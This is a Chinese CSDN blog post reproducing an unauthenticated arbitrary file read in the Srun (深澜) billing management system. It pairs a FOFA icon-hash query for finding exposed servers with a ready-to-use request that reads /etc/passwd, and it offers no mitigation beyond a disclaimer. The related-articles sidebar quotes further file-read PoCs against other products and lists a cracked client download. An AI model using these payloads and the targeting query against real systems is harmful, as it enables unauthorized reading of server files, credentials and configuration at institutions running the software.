【漏洞复现】深澜计费管理系统任意文件读取漏洞

最新推荐文章于 2024-05-16 12:07:44 发布
最新推荐文章于 2024-05-16 12:07:44 发布
阅读量591 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137614062
版权
本文详细介绍了深澜计费管理系统中存在的任意文件读取漏洞,该漏洞可能导致未授权的攻击者获取服务器上的任意文件。文章涵盖了漏洞概述、影响范围,并通过步骤复现了漏洞,旨在帮助读者理解和防范此类安全风险。
摘要由CSDN通过智能技术生成

0x01 产品简介

深澜计费管理系统是一套完善的、领先的具有复杂生物型特征的弹性认证计费系统。其主要由以下几个模块组成:AAA认证计费平台、系统运营维护管理平台、用户及策略管理平台、用户自助服务平台、智能客户端模块、消息推送模块以及数据统计模块。该系统为全球超过2500家客户提供服务,其中包括中国Top100高校中的60%选用本产品。

0x02 漏洞概述

深澜计费管理系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件。

0x03 测绘语句

fofa:icon_hash="-1546320596"

0x04 漏洞复现

GET /user/group/down-load?file=/etc/passwd HTTP/1.1

0x05 影响范围

深澜计费管理系统

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
深澜计费管理系统 任意文件读取漏洞复现
0xSec
04-05 806
深澜计费管理系统/demo/proxy接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
深澜计费管理系统任意文件读取
最新发布
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
05-30 415
深澜计费管理系统是一个全面的软件解决方案,旨在帮助企业管理其计费和发票流程。它提供了一套全面的功能,可简化计费任务,提高准确性并优化收入管理。
CVE-2024-23897 JenKins任意文件读取漏洞复现(1)
2401_84519960的博客
05-16 663
Python编程学习,学习内容包含:语法、正则、文件网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
任意文件读取漏洞复现(CVE-2021-14544)
FODKING的博客
11-22 2917
海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544) 实验工具:burpsuite fodo 实验流程: 实现条件用fodo搜索用海康威视流媒体管理服务器的web端 1.发现它是弱口令直接用弱口令登录 admin 12345 就离谱 发现这应该是一个刚建立的不用的服务器 2.在日志文件中下载一个文件 3.用抓包软件抓取数据包 构建pyload …/…/…/…/…/…/…/windows/system32/drivers/etc/slt 4.发现数据包中存在任意
windows 任意文件读取漏洞复现
StriveBen的博客
01-02 2497
复现windows 的最新0day(任意用户下,可以读取任意文件)之前,先简单介绍下windows 下用户管理需要的基本命令。 文章首发公众号,欢迎大家关注,并进技术交流群(363034250),共同进步哈。 windows 用户管理基本命令 查看用户 net user 查看所有用户: 查看用户权限 net user xxx 该命令可以查看用户的权限,如下图,在本地组成员...
任意文件读取漏洞复现
来日可期的博客
08-31 3446
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 4523
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
Windows任意文件读取漏洞复现
qq_36288082的博客
12-24 1422
Windows任意文件读取漏洞复现 近日国外某安全员发布了针对Windows操作系统的最新0day漏洞poc,该poc可以使得普通用户可以访问管理员目录下的文件 根据该安全员披露: 零日漏洞存在于Windows的“MsiAdvertiseProduct”功能中,该功能负责生成“广告脚本或将产品通告给计算机,并使安装程序能够将用于分配或发布产品的注册表和快捷方式信息写入脚本。 由于验证不当,可能会滥...
Apache-Solr 任意文件读取漏洞复现
不想当脚本小子的脚本小子
03-20 673
2021.3.18新出的,无CVE编号 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果 一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文.
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 814
任务环境说明:服务器场景:Server1。
泛微云桥任意文件读取漏洞复现[09/18]
weixin_39811856的博客
09-18 1391
1.老规矩,搜寻目标机器(xpath用起来确实很方便) 2.根据网上的POC试试: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* 3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍: 发现这个好像有戏,没有/etc/passwd,并且还是
深澜认证客户端破解版(自编写软件)
11-08
深澜认证客户端破解版(自编写软件),注意填写服务器和端口号,还需注意n的值一般为1~20
Flink任意文件读写漏洞复现及排查
dayouzi的博客
08-14 295
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行。Apache Flink的数据流编程模型在有限和无限数据集上提供单次事件(event-at-a-time)处理。在基础层面,Flink程序由流和转换组成。
深澜计费管理系统 /demo/proxy存在任意文件读取漏洞
wan___she__pi的博客
04-18 593
深澜计费管理系统是一款用于网络设备计费管理的软件系统。它主要用于对网络设备的使用情况进行监控和计费,帮助企业实现对网络资源的合理分配和使用。深澜计费管理系统/demo/proxy存在任意文件读取漏洞
mysql数据库 srun3000_深澜安全认证网络管理计费系统(Srun 3000) /srun3/srun/services/modules/login/controller/login_con...
weixin_29047919的博客
02-08 1133
### 0x01 漏洞框架Srun3000深澜校园宽带客户端是深澜软件面向校园网推出的安全认证网络管理计费产品。/srun3/srun/services/modules/login/controller/login_controller.php存在任意文件下载漏洞。影响厂商:深澜软件官方主页:http://www.srun.com/![](https://images.seebug.org/con...
蓝海卓越计费管理系统任意文件读取漏洞
Cwillchris的博客
06-16 246
将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。python3 fofa-cwillchris.py -k "蓝海卓越计费管理系统"./蓝海卓越计费管理系统.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
深澜系统服务器架构,深澜基于用户策略的高性能校园网认证计费系统
weixin_39637545的博客
08-06 2452
概述网络发展到现今,教育行业的网络的应用已经获得了长足的发展。随着网络应用的深入,宽带接入互联网显现了很多亟待解决的管理问题。校园网迫切需要对于上网用户进行必要的管理。随着上网用户数量的增加,校园网早已不再是一个小的局域网,而更象是一个区网甚至于市级网的级别。同时校园网建设中还有其自身的特点:高接入,随着高校的发展、网络接入带宽越来越大,千兆接入已经成为常态,双千兆接入或者多千兆接入也更多的被使用...
CVE-2020-1938
sechelper的博客
12-07 1060
CVE-2020-1938漏洞复现
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 1799
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
c语言综合实验(三)计费管理系统文件存储管理
05-09
计费管理系统是一种用于管理和记录用户及其消费信息的系统,文件存储管理是该系统的重要组成部分之一。C语言综合实验(三)计费管理系统文件存储管理主要是指将用户和消费数据存储到文件中,以保证数据的可持久化。本文将针对以下几个方面进行详细阐述: 1.文件存储的基础知识 文件是计算机上的一种数据存储方式,是对数据进行长期存储和保护的便捷途径。文件存储的基本单位是字节(Byte),文件中的数据按照一定的格式被存储到硬盘等媒介中。文件的读写是程序与外部环境(例如硬盘)进行数据交互的方式之一。常见的文件类型有文本文件和二进制文件两种。文本文件是指由若干个符合编码规范的字符序列组成的文件,例如txt文件,二进制文件是指由0和1组成的文件,例如图片、音频等文件。 2.文件读写的方法 在C语言中,文件读写的操作包含三个主要步骤:打开文件读取/写入文件内容和关闭文件文件的打开和关闭使用fopen和fclose函数,读取/写入文件内容使用fread和fwrite函数。这些函数都是C语言标准库中的常用函数,定义在stdio.h头文件中。在进行文件读写时,需要指定文件名、访问模式、数据读写位置等参数信息。 3.计费管理系统文件存储 计费管理系统需要将用户信息和消费信息存储到文件中,以便在程序下次启动时能够读取之前的数据并进行数据维护工作。该系统可以采用文本文件的形式存储数据,使用逗号、空格等分隔符将不同字段的数据分开。例如,可以将用户信息分为编号、姓名、电话三个字段,消费信息分为时间、原因、金额等字段,每个字段之间使用逗号分隔。存储数据的文件名可以自行定义,例如”user.txt”、”consume.txt”等。 4.文件读写的错误处理 文件读写过程中可能会出现很多问题,例如文件不存在、打开文件失败、读写错误等情况,需要做好相应的错误处理工作。在C语言中,可以使用fopen函数设置访问文件的模式(只读、只写、读写)、文件操作指针(文件开头、文件结尾、指定位置)等信息,并通过返回值判断文件是否打开成功。另外,在使用完文件后,需要调用fclose函数关闭文件以释放资源。如果在读写过程中出现错误,可以使用ferror函数进行错误检查并进行错误处理。 综上所述,计费管理系统文件存储管理是一项十分重要的任务,需要对文件的打开、读写、关闭、错误处理等操作进行认真细致的处理,以保证数据的完整性和正确性。在实际操作中,还需要考虑数据格式的统一性、文件的备份和恢复、文件操作并发性等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值